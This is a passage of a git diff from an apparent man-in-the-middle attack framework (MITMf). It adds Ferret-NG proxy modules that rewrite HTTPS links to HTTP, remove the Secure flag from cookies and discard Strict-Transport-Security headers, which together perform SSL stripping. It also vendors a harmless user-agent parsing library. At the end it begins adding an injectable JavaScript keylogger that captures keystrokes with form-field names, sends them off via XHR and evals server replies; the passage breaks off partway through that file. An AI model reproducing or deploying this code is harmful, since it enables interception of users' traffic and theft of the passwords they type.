+ to make note of any relative links, as the server will be expecting those to be requested
+ via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
+ '''
+
+ cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
+ cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
+ iconExpression = re.compile(r"", re.IGNORECASE)
+ linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
+ headExpression = re.compile(r"", re.IGNORECASE)
+
+ def __init__(self, command, uri, postData, headers, client):
+ ServerConnection.__init__(self, command, uri, postData, headers, client)
+ self.urlMonitor = URLMonitor.getInstance()
+
+ def getLogLevel(self):
+ return logging.INFO
+
+ def getPostPrefix(self):
+ return "SECURE POST"
+
+ def handleHeader(self, key, value):
+ if (key.lower() == 'set-cookie'):
+ value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
+
+ ServerConnection.handleHeader(self, key, value)
+
+ def stripFileFromPath(self, path):
+ (strippedPath, lastSlash, file) = path.rpartition('/')
+ return strippedPath
+
+ def buildAbsoluteLink(self, link):
+ absoluteLink = ""
+
+ if ((not link.startswith('http')) and (not link.startswith('/'))):
+ absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
+
+ mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found path-relative link in secure transmission: " + link)
+ mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
+ elif not link.startswith('http'):
+ absoluteLink = "http://"+self.headers['host']+link
+
+ mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found relative link in secure transmission: " + link)
+ mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute link: " + absoluteLink)
+
+ if not absoluteLink == "":
+ absoluteLink = absoluteLink.replace('&', '&')
+ self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
+
+ def replaceCssLinks(self, data):
+ iterator = re.finditer(SSLServerConnection.cssExpression, data)
+
+ for match in iterator:
+ self.buildAbsoluteLink(match.group(1))
+
+ return data
+
+ def replaceSecureLinks(self, data):
+ data = ServerConnection.replaceSecureLinks(self, data)
+ data = self.replaceCssLinks(data)
+
+ iterator = re.finditer(SSLServerConnection.linkExpression, data)
+
+ for match in iterator:
+ self.buildAbsoluteLink(match.group(10))
+
+ return data
diff --git a/core/ferretng/ServerConnection.py b/core/ferretng/ServerConnection.py
new file mode 100644
index 0000000..e1e04ef
--- /dev/null
+++ b/core/ferretng/ServerConnection.py
@@ -0,0 +1,193 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+import re
+import string
+import random
+import zlib
+import gzip
+import StringIO
+import sys
+
+from twisted.web.http import HTTPClient
+from URLMonitor import URLMonitor
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ServerConnection(HTTPClient):
+
+ ''' The server connection is where we do the bulk of the stripping. Everything that
+ comes back is examined. The headers we dont like are removed, and the links are stripped
+ from HTTPS to HTTP.
+ '''
+
+ urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
+ urlType = re.compile(r"https://", re.IGNORECASE)
+ urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
+ urlTypewww = re.compile(r"https://www", re.IGNORECASE)
+ urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
+ urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
+ urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
+ #urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
+
+ def __init__(self, command, uri, postData, headers, client):
+
+ self.command = command
+ self.uri = uri
+ self.postData = postData
+ self.headers = headers
+ self.client = client
+ self.clientInfo = None
+ self.urlMonitor = URLMonitor.getInstance()
+ self.isImageRequest = False
+ self.isCompressed = False
+ self.contentLength = None
+ self.shutdownComplete = False
+
+ def getPostPrefix(self):
+ return "POST"
+
+ def sendRequest(self):
+ if self.command == 'GET':
+
+ mitmf_logger.debug(self.client.getClientIP() + " [Ferret-NG] Sending Request: {}".format(self.headers['host']))
+
+ self.sendCommand(self.command, self.uri)
+
+ def sendHeaders(self):
+ for header, value in self.headers.iteritems():
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Sending header: ({}: {})".format(header, value))
+ self.sendHeader(header, value)
+
+ self.endHeaders()
+
+ def sendPostData(self):
+
+ self.transport.write(self.postData)
+
+ def connectionMade(self):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] HTTP connection made.")
+ self.sendRequest()
+ self.sendHeaders()
+
+ if (self.command == 'POST'):
+ self.sendPostData()
+
+ def handleStatus(self, version, code, message):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Server response: {} {} {}".format(version, code, message))
+ self.client.setResponseCode(int(code), message)
+
+ def handleHeader(self, key, value):
+ if (key.lower() == 'location'):
+ value = self.replaceSecureLinks(value)
+
+ if (key.lower() == 'content-type'):
+ if (value.find('image') != -1):
+ self.isImageRequest = True
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is image content, not scanning")
+
+ if (key.lower() == 'content-encoding'):
+ if (value.find('gzip') != -1):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is compressed")
+ self.isCompressed = True
+
+ elif (key.lower()== 'strict-transport-security'):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Zapped a strict-trasport-security header")
+
+ elif (key.lower() == 'content-length'):
+ self.contentLength = value
+
+ elif (key.lower() == 'set-cookie'):
+ self.client.responseHeaders.addRawHeader(key, value)
+
+ else:
+ self.client.setHeader(key, value)
+
+ def handleEndHeaders(self):
+ if (self.isImageRequest and self.contentLength != None):
+ self.client.setHeader("Content-Length", self.contentLength)
+
+ if self.length == 0:
+ self.shutdown()
+
+ if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
+ for header, value in self.client.headers.iteritems():
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Receiving header: ({}: {})".format(header, value))
+
+ def handleResponsePart(self, data):
+ if (self.isImageRequest):
+ self.client.write(data)
+ else:
+ HTTPClient.handleResponsePart(self, data)
+
+ def handleResponseEnd(self):
+ if (self.isImageRequest):
+ self.shutdown()
+ else:
+ try:
+ HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
+ except:
+ pass
+
+ def handleResponse(self, data):
+ if (self.isCompressed):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Decompressing content...")
+ data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
+
+ data = self.replaceSecureLinks(data)
+
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Read from server {} bytes of data".format(len(data)))
+
+ if (self.contentLength != None):
+ self.client.setHeader('Content-Length', len(data))
+
+ try:
+ self.client.write(data)
+ except:
+ pass
+
+ try:
+ self.shutdown()
+ except:
+ mitmf_logger.info("[Ferret-NG] [ServerConnection] Client connection dropped before request finished.")
+
+ def replaceSecureLinks(self, data):
+
+ iterator = re.finditer(ServerConnection.urlExpression, data)
+
+ for match in iterator:
+ url = match.group()
+
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Found secure reference: " + url)
+
+ url = url.replace('https://', 'http://', 1)
+ url = url.replace('&', '&')
+ self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
+
+ data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
+ return re.sub(ServerConnection.urlType, 'http://', data)
+
+ def shutdown(self):
+ if not self.shutdownComplete:
+ self.shutdownComplete = True
+ try:
+ self.client.finish()
+ self.transport.loseConnection()
+ except:
+ pass
diff --git a/core/ferretng/ServerConnectionFactory.py b/core/ferretng/ServerConnectionFactory.py
new file mode 100644
index 0000000..a64c800
--- /dev/null
+++ b/core/ferretng/ServerConnectionFactory.py
@@ -0,0 +1,48 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+from twisted.internet.protocol import ClientFactory
+
+mitmf_logger = logging.getLogger('mimtf')
+
+class ServerConnectionFactory(ClientFactory):
+
+ def __init__(self, command, uri, postData, headers, client):
+ self.command = command
+ self.uri = uri
+ self.postData = postData
+ self.headers = headers
+ self.client = client
+
+ def buildProtocol(self, addr):
+ return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
+
+ def clientConnectionFailed(self, connector, reason):
+ mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
+
+ destination = connector.getDestination()
+
+ if (destination.port != 443):
+ mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
+ self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
+ else:
+ try:
+ self.client.finish()
+ except:
+ pass
diff --git a/core/ferretng/URLMonitor.py b/core/ferretng/URLMonitor.py
new file mode 100644
index 0000000..85386f9
--- /dev/null
+++ b/core/ferretng/URLMonitor.py
@@ -0,0 +1,86 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import re
+import os
+import logging
+
+mitmf_logger = logging.getLogger('mimtf')
+
+class URLMonitor:
+
+ '''
+ The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
+ server is expecting over SSL. It also keeps track of secure favicon urls.
+ '''
+
+ # Start the arms race, and end up here...
+ javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
+ cookies = dict()
+ hijack_client = ''
+ _instance = None
+
+ def __init__(self):
+ self.strippedURLs = set()
+ self.strippedURLPorts = dict()
+
+ @staticmethod
+ def getInstance():
+ if URLMonitor._instance == None:
+ URLMonitor._instance = URLMonitor()
+
+ return URLMonitor._instance
+
+ def isSecureLink(self, client, url):
+ for expression in URLMonitor.javascriptTrickery:
+ if (re.match(expression, url)):
+ return True
+
+ return (client,url) in self.strippedURLs
+
+ def getSecurePort(self, client, url):
+ if (client,url) in self.strippedURLs:
+ return self.strippedURLPorts[(client,url)]
+ else:
+ return 443
+
+ def addSecureLink(self, client, url):
+ methodIndex = url.find("//") + 2
+ method = url[0:methodIndex]
+
+ pathIndex = url.find("/", methodIndex)
+ if pathIndex is -1:
+ pathIndex = len(url)
+ url += "/"
+
+ host = url[methodIndex:pathIndex].lower()
+ path = url[pathIndex:]
+
+ port = 443
+ portIndex = host.find(":")
+
+ if (portIndex != -1):
+ host = host[0:portIndex]
+ port = host[portIndex+1:]
+ if len(port) == 0:
+ port = 443
+
+ url = method + host + path
+
+ self.strippedURLs.add((client, url))
+ self.strippedURLPorts[(client, url)] = int(port)
diff --git a/core/wrappers/__init__.py b/core/ferretng/__init__.py
similarity index 100%
rename from core/wrappers/__init__.py
rename to core/ferretng/__init__.py
diff --git a/core/httpagentparser.py b/core/httpagentparser.py
new file mode 100644
index 0000000..0c739ac
--- /dev/null
+++ b/core/httpagentparser.py
@@ -0,0 +1,673 @@
+#
+#httpagentparser library, stolen from https://github.com/shon/httpagentparser
+#
+
+"""
+Extract client information from http user agent
+The module does not try to detect all capabilities of browser in current form (it can easily be extended though).
+Tries to
+ * be fast
+ * very easy to extend
+ * reliable enough for practical purposes
+ * assist python web apps to detect clients.
+"""
+
+__version__ = '1.7.7'
+
+
+class DetectorsHub(dict):
+ _known_types = ['os', 'dist', 'flavor', 'browser']
+
+ def __init__(self, *args, **kw):
+ dict.__init__(self, *args, **kw)
+ for typ in self._known_types:
+ self.setdefault(typ, [])
+ self.registerDetectors()
+
+ def register(self, detector):
+ if detector.info_type not in self._known_types:
+ self[detector.info_type] = [detector]
+ self._known_types.insert(detector.order, detector.info_type)
+ else:
+ self[detector.info_type].append(detector)
+
+ def __iter__(self):
+ return iter(self._known_types)
+
+ def registerDetectors(self):
+ detectors = [v() for v in globals().values() if DetectorBase in getattr(v, '__mro__', [])]
+ for d in detectors:
+ if d.can_register:
+ self.register(d)
+
+
+class DetectorBase(object):
+ name = "" # "to perform match in DetectorsHub object"
+ info_type = "override me"
+ result_key = "override me"
+ order = 10 # 0 is highest
+ look_for = "string to look for"
+ skip_if_found = [] # strings if present stop processin
+ can_register = False
+ version_markers = [("/", " ")]
+ allow_space_in_version = False
+ _suggested_detectors = None
+ platform = None
+ bot = False
+
+ def __init__(self):
+ if not self.name:
+ self.name = self.__class__.__name__
+ self.can_register = (self.__class__.__dict__.get('can_register', True))
+
+ def detect(self, agent, result):
+ # -> True/None
+ word = self.checkWords(agent)
+ if word:
+ result[self.info_type] = dict(name=self.name)
+ result['bot'] = self.bot
+ version = self.getVersion(agent, word)
+ if version:
+ result[self.info_type]['version'] = version
+ if self.platform:
+ result['platform'] = {'name': self.platform, 'version': version}
+ return True
+
+ def checkWords(self, agent):
+ # -> True/None
+ for w in self.skip_if_found:
+ if w in agent:
+ return False
+ if isinstance(self.look_for, (tuple, list)):
+ for word in self.look_for:
+ if word in agent:
+ return word
+ elif self.look_for in agent:
+ return self.look_for
+
+ def getVersion(self, agent, word):
+ """
+ => version string /None
+ """
+ version_markers = self.version_markers if \
+ isinstance(self.version_markers[0], (list, tuple)) else [self.version_markers]
+ version_part = agent.split(word, 1)[-1]
+ for start, end in version_markers:
+ if version_part.startswith(start) and end in version_part:
+ version = version_part[1:]
+ if end: # end could be empty string
+ version = version.split(end)[0]
+ if not self.allow_space_in_version:
+ version = version.split()[0]
+ return version
+
+
+class OS(DetectorBase):
+ info_type = "os"
+ can_register = False
+ version_markers = [";", " "]
+ allow_space_in_version = True
+ platform = None
+
+
+class Dist(DetectorBase):
+ info_type = "dist"
+ can_register = False
+ platform = None
+
+
+class Flavor(DetectorBase):
+ info_type = "flavor"
+ can_register = False
+ platform = None
+
+
+class Browser(DetectorBase):
+ info_type = "browser"
+ can_register = False
+
+
+class Firefox(Browser):
+ look_for = "Firefox"
+ version_markers = [('/', '')]
+ skip_if_found = ["SeaMonkey", "web/snippet"]
+
+
+class SeaMonkey(Browser):
+ look_for = "SeaMonkey"
+ version_markers = [('/', '')]
+
+
+class Konqueror(Browser):
+ look_for = "Konqueror"
+ version_markers = ["/", ";"]
+
+
+class OperaMobile(Browser):
+ look_for = "Opera Mobi"
+ name = "Opera Mobile"
+
+ def getVersion(self, agent, word):
+ try:
+ look_for = "Version"
+ return agent.split(look_for)[1][1:].split(' ')[0]
+ except IndexError:
+ look_for = "Opera"
+ return agent.split(look_for)[1][1:].split(' ')[0]
+
+
+class Opera(Browser):
+ look_for = "Opera"
+
+ def getVersion(self, agent, word):
+ try:
+ look_for = "Version"
+ return agent.split(look_for)[1][1:].split(' ')[0]
+ except IndexError:
+ look_for = "Opera"
+ version = agent.split(look_for)[1][1:].split(' ')[0]
+ return version.split('(')[0]
+
+
+class OperaNew(Browser):
+ """
+ Opera after version 15
+ """
+ name = "Opera"
+ look_for = "OPR"
+ version_markers = [('/', '')]
+
+
+class Netscape(Browser):
+ look_for = "Netscape"
+ version_markers = [("/", '')]
+
+
+class Trident(Browser):
+ look_for = "Trident"
+ skip_if_found = ["MSIE", "Opera"]
+ name = "IE"
+ version_markers = ["/", ";"]
+ trident_to_ie_versions = {
+ '4.0': '8.0',
+ '5.0': '9.0',
+ '6.0': '10.0',
+ '7.0': '11.0',
+ }
+
+ def getVersion(self, agent, word):
+ return self.trident_to_ie_versions.get(super(Trident, self).getVersion(agent, word))
+
+
+class MSIE(Browser):
+ look_for = "MSIE"
+ skip_if_found = ["Opera"]
+ name = "IE"
+ version_markers = [" ", ";"]
+
+
+class Galeon(Browser):
+ look_for = "Galeon"
+
+
+class WOSBrowser(Browser):
+ look_for = "wOSBrowser"
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class Safari(Browser):
+ look_for = "Safari"
+
+ def checkWords(self, agent):
+ unless_list = ["Chrome", "OmniWeb", "wOSBrowser", "Android"]
+ if self.look_for in agent:
+ for word in unless_list:
+ if word in agent:
+ return False
+ return self.look_for
+
+ def getVersion(self, agent, word):
+ if "Version/" in agent:
+ return agent.split('Version/')[-1].split(' ')[0].strip()
+ if "Safari/" in agent:
+ return agent.split('Safari/')[-1].split(' ')[0].strip()
+ else:
+ return agent.split('Safari ')[-1].split(' ')[0].strip() # Mobile Safari
+
+class GoogleBot(Browser):
+ # https://support.google.com/webmasters/answer/1061943
+ look_for = ["Googlebot", "Googlebot-News", "Googlebot-Image",
+ "Googlebot-Video", "Googlebot-Mobile", "Mediapartners-Google",
+ "Mediapartners", "AdsBot-Google", "web/snippet"]
+ bot = True
+ version_markers = [('/', ';'), ('/', ' ')]
+
+class GoogleFeedFetcher(Browser):
+ look_for = "Feedfetcher-Google"
+ bot = True
+
+ def get_version(self, agent):
+ pass
+
+class RunscopeRadar(Browser):
+ look_for = "runscope-radar"
+ bot = True
+
+class GoogleAppEngine(Browser):
+ look_for = "AppEngine-Google"
+ bot = True
+
+ def get_version(self, agent):
+ pass
+
+class GoogleApps(Browser):
+ look_for = "GoogleApps script"
+ bot = True
+
+ def get_version(self, agent):
+ pass
+
+class TwitterBot(Browser):
+ look_for = "Twitterbot"
+ bot = True
+
+class MJ12Bot(Browser):
+ look_for = "MJ12bot"
+ bot = True
+
+class YandexBot(Browser):
+ # http://help.yandex.com/search/robots/agent.xml
+ look_for = "Yandex"
+ bot = True
+
+ def getVersion(self, agent, word):
+ return agent[agent.index('Yandex'):].split('/')[-1].split(')')[0].strip()
+
+class BingBot(Browser):
+ look_for = "bingbot"
+ version_markers = ["/", ";"]
+ bot = True
+
+
+class BaiduBot(Browser):
+ # http://help.baidu.com/question?prod_en=master&class=1&id=1000973
+ look_for = ["Baiduspider", "Baiduspider-image", "Baiduspider-video",
+ "Baiduspider-news", "Baiduspider-favo", "Baiduspider-cpro",
+ "Baiduspider-ads"]
+ bot = True
+ version_markers = ('/', ';')
+
+
+class LinkedInBot(Browser):
+ look_for = "LinkedInBot"
+ bot = True
+
+class ArchiveDotOrgBot(Browser):
+ look_for = "archive.org_bot"
+ bot = True
+
+class YoudaoBot(Browser):
+ look_for = "YoudaoBot"
+ bot = True
+
+class YoudaoBotImage(Browser):
+ look_for = "YodaoBot-Image"
+ bot = True
+
+class RogerBot(Browser):
+ look_for = "rogerbot"
+ bot = True
+
+class TweetmemeBot(Browser):
+ look_for = "TweetmemeBot"
+ bot = True
+
+class WebshotBot(Browser):
+ look_for = "WebshotBot"
+ bot = True
+
+class SensikaBot(Browser):
+ look_for = "SensikaBot"
+ bot = True
+
+class YesupBot(Browser):
+ look_for = "YesupBot"
+ bot = True
+
+class DotBot(Browser):
+ look_for = "DotBot"
+ bot = True
+
+class PhantomJS(Browser):
+ look_for = "Browser/Phantom"
+ bot = True
+
+class FacebookExternalHit(Browser):
+ look_for = 'facebookexternalhit'
+ bot = True
+
+
+class NokiaOvi(Browser):
+ look_for = "S40OviBrowser"
+
+class UCBrowser(Browser):
+ look_for = "UCBrowser"
+
+class BrowserNG(Browser):
+ look_for = "BrowserNG"
+
+class Dolfin(Browser):
+ look_for = 'Dolfin'
+
+class NetFront(Browser):
+ look_for = 'NetFront'
+
+class Jasmine(Browser):
+ look_for = 'Jasmine'
+
+class Openwave(Browser):
+ look_for = 'Openwave'
+
+class UPBrowser(Browser):
+ look_for = 'UP.Browser'
+
+class OneBrowser(Browser):
+ look_for = 'OneBrowser'
+
+class ObigoInternetBrowser(Browser):
+ look_for = 'ObigoInternetBrowser'
+
+class TelecaBrowser(Browser):
+ look_for = 'TelecaBrowser'
+
+class MAUI(Browser):
+ look_for = 'Browser/MAUI'
+
+ def getVersion(self, agent, word):
+ version = agent.split("Release/")[-1][:10]
+ return version
+
+
+class NintendoBrowser(Browser):
+ look_for = 'NintendoBrowser'
+
+
+class AndroidBrowser(Browser):
+ look_for = "Android"
+ skip_if_found = ['Chrome', 'Windows Phone']
+
+ # http://decadecity.net/blog/2013/11/21/android-browser-versions
+ def getVersion(self, agent, word):
+ pass
+
+
+class Linux(OS):
+ look_for = 'Linux'
+ platform = 'Linux'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class Blackberry(OS):
+ look_for = 'BlackBerry'
+ platform = 'BlackBerry'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class BlackberryPlaybook(Dist):
+ look_for = 'PlayBook'
+ platform = 'BlackBerry'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class WindowsPhone(OS):
+ name = "Windows Phone"
+ platform = 'Windows'
+ look_for = ["Windows Phone OS", "Windows Phone"]
+ version_markers = [(" ", ";"), (" ", ")")]
+
+
+class iOS(OS):
+ look_for = ('iPhone', 'iPad')
+ skip_if_found = ['like iPhone']
+
+
+class iPhone(Dist):
+ look_for = 'iPhone'
+ platform = 'iOS'
+ skip_if_found = ['like iPhone']
+
+ def getVersion(self, agent, word):
+ version_end_chars = [' ']
+ if not "iPhone OS" in agent:
+ return None
+ part = agent.split('iPhone OS')[-1].strip()
+ for c in version_end_chars:
+ if c in part:
+ version = part.split(c)[0]
+ return version.replace('_', '.')
+ return None
+
+
+class IPad(Dist):
+ look_for = 'iPad;'
+ platform = 'iOS'
+
+ def getVersion(self, agent, word):
+ version_end_chars = [' ']
+ if not "CPU OS " in agent:
+ return None
+ part = agent.split('CPU OS ')[-1].strip()
+ for c in version_end_chars:
+ if c in part:
+ version = part.split(c)[0]
+ return version.replace('_', '.')
+ return None
+
+
+class Macintosh(OS):
+ look_for = 'Macintosh'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class MacOS(Flavor):
+ look_for = 'Mac OS'
+ platform = 'Mac OS'
+ skip_if_found = ['iPhone', 'iPad']
+
+ def getVersion(self, agent, word):
+ version_end_chars = [';', ')']
+ part = agent.split('Mac OS')[-1].strip()
+ for c in version_end_chars:
+ if c in part:
+ version = part.split(c)[0]
+ return version.replace('_', '.')
+ return ''
+
+
+class Windows(Dist):
+ look_for = 'Windows'
+ platform = 'Windows'
+
+
+class Windows(OS):
+ look_for = 'Windows'
+ platform = 'Windows'
+ skip_if_found = ["Windows Phone"]
+ win_versions = {
+ "NT 6.3": "8.1",
+ "NT 6.2": "8",
+ "NT 6.1": "7",
+ "NT 6.0": "Vista",
+ "NT 5.2": "Server 2003 / XP x64",
+ "NT 5.1": "XP",
+ "NT 5.01": "2000 SP1",
+ "NT 5.0": "2000",
+ "98; Win 9x 4.90": "Me"
+ }
+
+ def getVersion(self, agent, word):
+ v = agent.split('Windows')[-1].split(';')[0].strip()
+ if ')' in v:
+ v = v.split(')')[0]
+ v = self.win_versions.get(v, v)
+ return v
+
+
+class Ubuntu(Dist):
+ look_for = 'Ubuntu'
+ version_markers = ["/", " "]
+
+
+class Debian(Dist):
+ look_for = 'Debian'
+ version_markers = ["/", " "]
+
+
+class Chrome(Browser):
+ look_for = "Chrome"
+ version_markers = ["/", " "]
+ skip_if_found = ["OPR"]
+
+ def getVersion(self, agent, word):
+ part = agent.split(word + self.version_markers[0])[-1]
+ version = part.split(self.version_markers[1])[0]
+ if '+' in version:
+ version = part.split('+')[0]
+ return version.strip()
+
+
+class ChromeiOS(Browser):
+ look_for = "CriOS"
+ version_markers = ["/", " "]
+
+
+class ChromeOS(OS):
+ look_for = "CrOS"
+ platform = ' ChromeOS'
+ version_markers = [" ", " "]
+
+ def getVersion(self, agent, word):
+ version_markers = self.version_markers
+ if word + '+' in agent:
+ version_markers = ['+', '+']
+ return agent.split(word + version_markers[0])[-1].split(version_markers[1])[1].strip()[:-1]
+
+
+class Android(Dist):
+ look_for = 'Android'
+ platform = 'Android'
+ skip_if_found = ['Windows Phone']
+
+ def getVersion(self, agent, word):
+ return agent.split(word)[-1].split(';')[0].strip()
+
+
+class WebOS(Dist):
+ look_for = 'hpwOS'
+
+ def getVersion(self, agent, word):
+ return agent.split('hpwOS/')[-1].split(';')[0].strip()
+
+
+class NokiaS40(OS):
+ look_for = 'Series40'
+ platform = 'Nokia S40'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class Symbian(OS):
+ look_for = ['Symbian', 'SymbianOS']
+ platform = 'Symbian'
+
+
+class PlayStation(OS):
+ look_for = ['PlayStation', 'PLAYSTATION']
+ platform = 'PlayStation'
+ version_markers = [" ", ")"]
+
+
+class prefs: # experimental
+ os = dict(
+ Linux=dict(dict(browser=[Firefox, Chrome], dist=[Ubuntu, Android])),
+ BlackBerry=dict(dist=[BlackberryPlaybook]),
+ Macintosh=dict(flavor=[MacOS]),
+ Windows=dict(browser=[MSIE, Firefox]),
+ ChromeOS=dict(browser=[Chrome]),
+ Debian=dict(browser=[Firefox])
+ )
+ dist = dict(
+ Ubuntu=dict(browser=[Firefox]),
+ Android=dict(browser=[Safari]),
+ IPhone=dict(browser=[Safari]),
+ IPad=dict(browser=[Safari]),
+ )
+ flavor = dict(
+ MacOS=dict(browser=[Opera, Chrome, Firefox, MSIE])
+ )
+
+
+detectorshub = DetectorsHub()
+
+
+def detect(agent, fill_none=False):
+ """
+ fill_none: if name/version is not detected respective key is still added to the result with value None
+ """
+ result = dict(platform=dict(name=None, version=None))
+ _suggested_detectors = []
+
+ for info_type in detectorshub:
+ detectors = _suggested_detectors or detectorshub[info_type]
+ for detector in detectors:
+ try:
+ detector.detect(agent, result)
+ except Exception as _err:
+ pass
+
+ if fill_none:
+ attrs_d = {'name': None, 'version': None}
+ for key in ('os', 'browser'):
+ if key not in result:
+ result[key] = attrs_d
+ else:
+ for k, v in attrs_d.items():
+ result[k] = v
+
+ return result
+
+
+def simple_detect(agent):
+ """
+ -> (os, browser) # tuple of strings
+ """
+ result = detect(agent)
+ os_list = []
+ if 'flavor' in result:
+ os_list.append(result['flavor']['name'])
+ if 'dist' in result:
+ os_list.append(result['dist']['name'])
+ if 'os' in result:
+ os_list.append(result['os']['name'])
+
+ os = os_list and " ".join(os_list) or "Unknown OS"
+ os_version = os_list and (result.get('flavor') and result['flavor'].get('version')) or \
+ (result.get('dist') and result['dist'].get('version')) or (result.get('os') and result['os'].get('version')) or ""
+ browser = 'browser' in result and result['browser'].get('name') or 'Unknown Browser'
+ browser_version = 'browser' in result and result['browser'].get('version') or ""
+ if browser_version:
+ browser = " ".join((browser, browser_version))
+ if os_version:
+ os = " ".join((os, os_version))
+ return os, browser
diff --git a/core/javascript/msfkeylogger.js b/core/javascript/msfkeylogger.js
new file mode 100644
index 0000000..5110961
--- /dev/null
+++ b/core/javascript/msfkeylogger.js
@@ -0,0 +1,117 @@
+window.onload = function (){
+ var2 = ",";
+ name = '';
+ function make_xhr(){
+ var xhr;
+ try {
+ xhr = new XMLHttpRequest();
+ } catch(e) {
+ try {
+ xhr = new ActiveXObject("Microsoft.XMLHTTP");
+ } catch(e) {
+ xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
+ }
+ }
+ if(!xhr) {
+ throw "failed to create XMLHttpRequest";
+ }
+ return xhr;
+ }
+
+ xhr = make_xhr();
+ xhr.onreadystatechange = function() {
+ if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
+ eval(xhr.responseText);
+ }
+ }
+
+ if (window.addEventListener){
+ //console.log("first");
+ document.addEventListener('keypress', function2, true);
+ document.addEventListener('keydown', function1, true);
+ }
+ else if (window.attachEvent){
+ //console.log("second");
+ document.attachEvent('onkeypress', function2);
+ document.attachEvent('onkeydown', function1);
+ }
+ else {
+ //console.log("third");
+ document.onkeypress = function2;
+ document.onkeydown = function1;
+ }
+}
+
+function function2(e)
+{
+ try
+ {
+ srcname = window.event.srcElement.name;
+ }catch(error)
+ {
+ srcname = e.srcElement ? e.srcElement.name : e.target.name
+ if (srcname == "")
+ {
+ srcname = e.target.name
+ }
+ }
+
+ var3 = (e) ? e.keyCode : e.which;
+ if (var3 == 0)
+ {
+ var3 = e.charCode
+ }
+
+ if (var3 != "d" && var3 != 8 && var3 != 9 && var3 != 13)
+ {
+ andxhr(var3.toString(16), srcname);
+ }
+}
+
+function function1(e)
+{
+ try
